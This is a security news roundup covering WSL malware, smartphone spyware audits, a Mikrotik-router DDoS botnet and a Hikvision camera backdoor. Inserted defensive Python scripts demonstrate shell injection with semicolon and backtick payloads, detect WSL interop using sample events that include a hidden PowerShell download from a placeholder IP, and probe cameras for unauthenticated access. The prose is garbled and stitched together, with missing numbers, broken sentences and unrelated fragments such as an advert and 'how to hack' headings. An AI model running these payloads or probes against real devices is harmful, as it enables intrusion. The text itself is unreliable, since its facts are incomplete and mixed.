This Week In Security: Somebody’s Watching, Microsoft + Linux, DDoS
The vulnerability is pre-authentication and requires no user interaction. It could be something as simple as a language chooser whose back-end does not sanitize its input, so that a backtick or a semicolon in the chosen value is enough to run an arbitrary command.
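To make the "language chooser" guess concrete, here is an added example (this is constructed illustration code, not the vendor's back-end and not taken from the article). A hypothetical handler builds a shell command line from the user-supplied language code, so a `;` or a backtick in that value is interpreted by the shell. Beside it are the two fixes a reviewer would ask for: running the helper without a shell so the value travels as a single argv element, and rejecting anything outside a strict allowlist before a process is started at all. `echo` stands in for whatever the real command would be, so the demonstration is harmless to run.

```python
import subprocess

# Constructed back-end for a "language chooser" (this example's own code, not the
# vendor's). The real command would copy or activate a language pack; `echo`
# stands in for it so the demonstration is harmless.
ALLOWED_LANGS = {"en", "de", "fr", "ja"}


def vulnerable_set_language(lang: str) -> str:
    """User input is interpolated into a command line handed to /bin/sh.
    A ';' or a backtick in `lang` is interpreted by the shell, not passed as data."""
    cmd = f"echo selected language: {lang}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def no_shell_set_language(lang: str) -> str:
    """Defense 1: no shell at all. The value is one argv element, so shell
    metacharacters are inert and reach the program as literal text."""
    result = subprocess.run(["echo", "selected", "language:", lang],
                            capture_output=True, text=True)
    return result.stdout


def hardened_set_language(lang: str) -> str:
    """Defense 2 on top of 1: strict allowlist. Anything outside the known set
    is rejected before it gets anywhere near a process."""
    if lang not in ALLOWED_LANGS:
        raise ValueError(f"unsupported language: {lang!r}")
    return no_shell_set_language(lang)


if __name__ == "__main__":
    for payload in ("en", "en; echo INJECTED", "en`echo INJECTED`"):
        print("payload:   ", repr(payload))
        print("vulnerable:", repr(vulnerable_set_language(payload)))
        print("no-shell:  ", repr(no_shell_set_language(payload)))
        try:
            print("hardened:  ", repr(hardened_set_language(payload)))
        except ValueError as exc:
            print("hardened:   rejected:", exc)
```

With the semicolon payload the vulnerable path prints two lines, the second produced by the injected `echo`; the no-shell path prints the whole payload as literal text; the hardened path refuses it outright. The allowlist is the real fix for a chooser with a finite set of values, and the argv form is the safety net for the day someone relaxes the allowlist.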
But if we were betting…
Linux Malware on Windows
In retrospect it should probably be obvious, but the Windows Subsystem for Linux was destined to become yet another infection vector for Windows machines.
From there, it makes calls out to the Windows API. The advantage of using WSL for malware is that it escapes detection by most of the security products on the market.
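The detection gap above is that the Linux side of WSL is a blind spot, but the moment the payload reaches back into Windows it has to create a Windows process, and that is visible in ordinary endpoint telemetry. The following is an added example (not from the article or from the research it summarizes) of the hunting logic a SOC could run over process-creation events: flag Windows executables whose parent is a WSL host process, and images executed from a WSL distribution share. The parent-image set and the UNC prefixes are this example's assumptions about how WSL interop appears in telemetry, and the Sysmon-style events are constructed sample data.

```python
from typing import Dict, Iterable, List

# Indicator sets used by this example. They are this example's assumptions about
# how WSL interop shows up in endpoint telemetry, not findings from the report
# discussed above.
WSL_HOST_IMAGES = {"wsl.exe", "wslhost.exe", "bash.exe"}
WSL_UNC_PREFIXES = ("\\\\wsl$\\", "\\\\wsl.localhost\\")

# Constructed Sysmon-style process-creation events (sample data, not real telemetry).
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"RecordId": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"RecordId": 2, "ParentImage": r"C:\Windows\System32\wsl.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c Invoke-WebRequest http://192.0.2.5/s"},
    {"RecordId": 3, "ParentImage": r"C:\Windows\System32\wslhost.exe",
     "Image": r"\\wsl$\Ubuntu\tmp\payload.exe", "CommandLine": "payload.exe"},
    {"RecordId": 4, "ParentImage": r"C:\Windows\System32\bash.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
]


def _basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def wsl_interop_findings(events: Iterable[Dict[str, object]]) -> List[Dict[str, object]]:
    """Flag Windows process creations that originate from WSL.

    Rule A: a Windows executable whose parent is a WSL host process, i.e. the
            Linux side reaching back into Windows (where a WSL-hosted loader
            would launch PowerShell or run a dropped PE).
    Rule B: an image executed from a WSL distribution path via the wsl$ or
            wsl.localhost UNC share.
    """
    prefixes = tuple(p.lower() for p in WSL_UNC_PREFIXES)
    findings: List[Dict[str, object]] = []
    for ev in events:
        image = str(ev.get("Image", ""))
        parent = str(ev.get("ParentImage", ""))
        reasons: List[str] = []
        if _basename(parent) in WSL_HOST_IMAGES and image.lower().endswith(".exe"):
            reasons.append("windows binary spawned by WSL host process " + _basename(parent))
        if image.lower().startswith(prefixes):
            reasons.append("image executed from WSL distribution share")
        if reasons:
            findings.append({"RecordId": ev.get("RecordId"), "Image": image,
                             "CommandLine": ev.get("CommandLine", ""), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in wsl_interop_findings(SAMPLE_EVENTS):
        print(f["RecordId"], f["Image"], "->", "; ".join(f["reasons"]))
```

On the sample data the explorer-launched notepad passes, the three WSL-originated launches are flagged, and the PE run from the distribution share matches both rules. In production this belongs in the SIEM as a correlation rule rather than a script, with the developer hosts that legitimately use interop allowlisted by user or path.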
Botnets are already scanning the internet for vulnerable machines and installing malware. The primary payload seems to be a Mirai variant, which among other things closes the vulnerable ports upon infection. This has the potential to be quite a big problem.
Smartphone Audit
How much do you trust your smartphone? How about a smartphone made by a Chinese company? All three brands are produced by companies based in China, so there are some understandable concerns about potential spyware.
If you think this is overly paranoid, go read about Project Rubicon. The conclusions? Xiaomi devices are actively running spyware and have censorship tools built in, although they are not actively blocking anything in international models.
The problem here is the app store that ships with those phones. Read the full paper, available here as a PDF.
This tool consists of a user-mode application and a Windows driver running in the kernel.
The front-end application makes IOCTL calls to the driver, which acts as a proxy, forwarding the calls on to various hardware and software endpoints. Any application can make those calls, adding to this recipe for disaster.
The attackers claim to be REvil, but that is likely a misdirection. Too many elements are unlike the way REvil operated. For instance, the initial ransom demand was delivered over Pastebin, and only asked for a single Bitcoin.
That has since been elevated to Bitcoins. While VoIP. This is an application-layer attack rather than a raw bandwidth attack, meaning the emphasis is on flooding the target with bogus requests rather than on saturating its links. When looking at the traffic sources, Qrator found a couple of odd similarities.
Almost all of the IPs had ports and open, a sign of Mikrotik devices. The current theory is that the botnet is almost entirely made up of Mikrotik routers. The last known remotely exploitable flaw in these devices was CVE, fixed back in The number of devices in this botnet is suspiciously similar to the number of vulnerable devices exposed to the internet in
Hikvision Security Cams Compromised to Display “HACKED”
And now malicious attackers are trying to exploit this vulnerability; the first example is the word HACKED appearing in place of the live feed on some models of Hikvision security cameras. Screenshot from ipcamtalk. On Sep 12, a security researcher using the alias Monte Crypto posted an access control bypass in Hikvision IP cameras to the Full Disclosure mailing list and warned users that a majority of these cameras contain a backdoor that allows unauthenticated impersonation of a configured user account.
In his Full Disclosure post, it is claimed that there is a superuser admin account in all devices manufactured by Hikvision. The post explains how to retrieve users and roles, how to download the camera configuration, and how to get a camera snapshot, all without authentication. Monte Crypto also noted that the vulnerability is not new and has been present in Hikvision products since
So what are the consequences of this mishap?
Monte Crypto explained that there are various negative repercussions of having a security camera with a backdoor installed. Moreover, you can also implement network access control rules that allow only trusted IP addresses to establish connections to the vulnerable devices.
It is worth noting that Hikvision IP cameras ship with UPnP enabled by default, so they can get exposed to the internet automatically.
Hikvision has already released firmware updates for numerous models of its security cameras in which the backdoor is removed, so you should install the update if it is available for your device. If you attempt to do so then a boot loop will occur, which can only be recovered from by installing the original Chinese-language firmware over TFTP.
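Two checks a practitioner would run after reading the above, as an added example (this is not code from the Full Disclosure post, from Hikvision, or from this article): probe the three resources the post says are reachable without credentials and flag a camera that serves them with HTTP 200, and verify that the network access control rule recommended earlier is actually in force by checking observed connection sources against the trusted ranges. The request paths are this example's assumed ISAPI-style paths, not taken from the post; the two fake responders are constructed to stand in for an unpatched and a patched camera, and the connection list is constructed sample data. `http_fetch` is the transport you would pass when pointing this at a real device you own.

```python
import ipaddress
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, List, Tuple

# Assumed ISAPI-style paths for the three resources the post says are reachable
# without authentication. The paths are this example's assumptions.
UNAUTH_CHECKS: Dict[str, str] = {
    "users_and_roles": "/ISAPI/Security/users",
    "configuration": "/System/configurationFile",
    "snapshot": "/ISAPI/Streaming/channels/1/picture",
}

# A transport: given a URL, return (HTTP status, body). No credentials are ever sent.
Fetch = Callable[[str], Tuple[int, bytes]]


def http_fetch(url: str, timeout: float = 5.0) -> Tuple[int, bytes]:
    """Real transport, for use against an actual camera on a network you own."""
    req = urllib.request.Request(url, headers={"User-Agent": "camera-audit"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, b""


def probe_unauthenticated(base_url: str, fetch: Fetch = http_fetch) -> Dict[str, bool]:
    """For each check, True means the camera handed over the resource without
    credentials (HTTP 200 with a body). A fixed device should answer 401 or 403."""
    exposed: Dict[str, bool] = {}
    for name, path in UNAUTH_CHECKS.items():
        status, body = fetch(base_url + path)
        exposed[name] = status == 200 and len(body) > 0
    return exposed


def acl_violations(trusted_cidrs: Iterable[str],
                   connections: Iterable[Tuple[str, int]]) -> List[Tuple[str, int]]:
    """Return observed (source_ip, camera_port) connections whose source lies
    outside every trusted network. Any hit means the ACL is not doing its job."""
    nets = [ipaddress.ip_network(c, strict=False) for c in trusted_cidrs]
    return [(src, port) for src, port in connections
            if not any(ipaddress.ip_address(src) in n for n in nets)]


# Constructed responders standing in for an unpatched and a patched camera.
def fake_unpatched_camera(url: str) -> Tuple[int, bytes]:
    return 200, b"<?xml version='1.0'?><UserList/>"


def fake_patched_camera(url: str) -> Tuple[int, bytes]:
    return 401, b""


# Constructed connection observations, e.g. from the firewall log in front of the camera.
TRUSTED = ["192.168.1.0/24", "10.0.0.5/32"]
SAMPLE_CONNECTIONS = [("192.168.1.20", 80), ("203.0.113.7", 80),
                      ("192.168.1.99", 554), ("198.51.100.4", 8000)]

if __name__ == "__main__":
    print("unpatched:", probe_unauthenticated("http://192.0.2.10", fake_unpatched_camera))
    print("patched:  ", probe_unauthenticated("http://192.0.2.10", fake_patched_camera))
    print("ACL gaps: ", acl_violations(TRUSTED, SAMPLE_CONNECTIONS))
```

Run the probe before and after a firmware update: every check should flip from True to False. The ACL check is worth scheduling, because a camera that was correctly fenced off on day one can be re-exposed later by the UPnP behaviour noted above, and the firewall log is where that shows up first.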
How to hack Hikvision camera (the easy way)
Is it safe to use Hikvision cameras? The risk is always there, no matter the device brand.
Hacking the Hikvision: part 1
Historically, Hikvision has had more security flaws than other camera manufacturers, but there is always a firmware release to correct the problem. So, if you have a Hikvision device, just keep it updated and take extra measures to protect your network from attackers to minimize the risk.
Conclusion
Hikvision is a well-known camera manufacturer that sells thousands of cameras around the world, and that makes the company a target for hackers. There are a lot of other non-branded Chinese cameras with security flaws, but because they are made by small companies they are less visible and do not draw attention to their devices.
Hikvision Patches Backdoor in IP Cameras
Make sure you test your cameras to see if they have security flaws. As mentioned above, most production is in China, and we know that not all technology from China is as good as the advertising claims: the manufacturer frequently refuses technical support for older firmware versions and software products, and budget models are not worth the money.
For a Hikvision camera to be truly effective, you need to be prepared for high financial costs.
Android in Hikvision video intercoms. Benefits and challenges
A smart camera from Faceter is considered a good alternative. To start video surveillance, you will need: the mobile application (download for Android here or for iOS); the IP camera that you install on the door; and your mobile phone, tablet, laptop or PC as a monitor. Images from the cameras are transmitted to the selected device in real time, with notifications in case of unwanted events.
Dahua, Hikvision IoT Devices Under Siege
Karas said the devices in question all were set up to be remotely accessible over the Internet, and were running with the default credentials.
"I sent them an email. If nothing changes, I will publish all details on March 20th, along with the firmware that disables the backdoor."
But on Mar. A special bulletin issued Mar.
"Hikvision strongly recommends that our dealer base review the security levels of equipment installed prior to June to ensure the use of complex passwords and upgraded firmware to best protect their customers."